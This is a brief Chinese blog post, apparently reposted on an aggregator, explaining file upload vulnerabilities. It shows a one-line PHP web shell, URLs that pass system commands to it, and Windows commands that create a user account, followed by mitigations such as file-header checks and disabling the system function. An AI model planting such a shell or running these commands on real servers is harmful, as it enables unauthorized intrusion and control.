码迷,mamicode.com
首页 > Web开发 > 详细

文件上传漏洞

时间:2016-07-31 22:12:42      阅读:204      评论:0      收藏:0      [点我收藏+]

标签:

约束文件类型

实例:

上传txt 

上传php文件 <?php phpinfo(); ?>  

上传木马 <?php system($_get[‘cmd‘]);?>   

    www.xxxx.ma.php?cmd=dir d:\

    www.xxxx.ma.php?cmd=shuntdown

新建用户

net user hello/add

net user hello/del

    www.xxxx.ma.php?cmd=echo test>>d:\hi.txt

避免:

1.文件上传的过滤

  a.通过文件后缀名   MP3 ->  php  截包绕过

  b.通过二进制来判断文件类型   通过文件头等判断

2.修改服务器核心参数,禁止脚本引擎允许命令

  php_ini   disable_functions = system

 

文件上传漏洞

标签:

原文地址:http://www.cnblogs.com/yuleitest/p/5723867.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!